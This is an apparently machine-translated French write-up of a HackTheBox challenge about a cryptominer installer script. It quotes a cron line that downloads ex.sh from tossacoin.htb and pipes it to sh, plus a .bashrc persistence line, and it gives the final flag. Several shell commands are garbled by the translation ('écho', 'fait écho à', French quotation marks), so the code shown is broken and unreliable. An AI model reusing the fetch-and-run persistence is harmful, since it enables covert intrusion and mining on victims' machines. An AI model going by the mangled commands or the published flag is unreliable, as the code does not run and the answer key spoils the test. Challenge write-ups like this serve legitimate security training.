Description
Dans la course au Vitalium sur Mars, le méchant Conseil d'Arodor a eu recours à des mesures désespérées, ayant besoin de fonds pour ses tentatives d'exploitation minière. Ils ont conçu un botnet spécialement conçu pour exploiter secrètement la crypto-monnaie. Nous sommes tombés sur un échantillon du programme d'installation du mineur d'Arodor sur notre serveur. Conscients de la gravité de la situation, nous avons lancé une enquête approfondie. Avec vous comme leader, vous devez démêler le fonctionnement interne du mécanisme d’installation. Cette découverte a constitué un tournant, révélant l’étendue du désespoir d’Arodor. Cependant, la bataille pour Vitalium se poursuit, nous incitant à rester vigilants et à adapter nos cyberdéfenses pour contrer les menaces futures.
Obtenir les notes du certificat OSCP
Le cours pratique complet sur les tests d’intrusion d’applications Web
Le défi montre un très long script bash contenant des chaînes codées en base64 telles que celles ci-dessous.
url locale = " http://tossacoin.htb/cGFydDI9Il90aDMxcl93NHkiCg = = "
dest=$(écho « X3QwX200cnN9Cg== »|base64 -d)
echo "ZXhwb3J0IHBhcnQ0PSJfdGgzX3IzZF9wbDRuM3R9Ig==" | base64 -d >> /home/$USER/.bashrc
echo '* * * * * $LDR http://tossacoin.htb/ex.sh | sh & echo -n cGFydDE9IkhUQnttMW4xbmciCg==|base64 -d > /dev/null 2>&1'
Tout ce que nous avons à faire est de décoder ces chaînes en base64 et de rassembler les parties composant le drapeau final.
$ fait écho cGFydDI9Il90aDMxcl93NHkiCg== | base64 -d
$ fait écho à « X3QwX200cnN9Cg== »|base64 -d
$ fait écho à « ZXhwb3J0IHBhcnQ0PSJfdGgzX3IzZF9wbDRuM3R9Ig== » | base64 -d
$ echo -n cGFydDE9IkhUQnttMW4xbmciCg==|base64 -d
Drapeau final
HTB{m1n1ng_th31r_w4y_t0_m4rs_th3_r3d_pl4n3t}
Liste de lecture des solutions vidéo HackTheBox
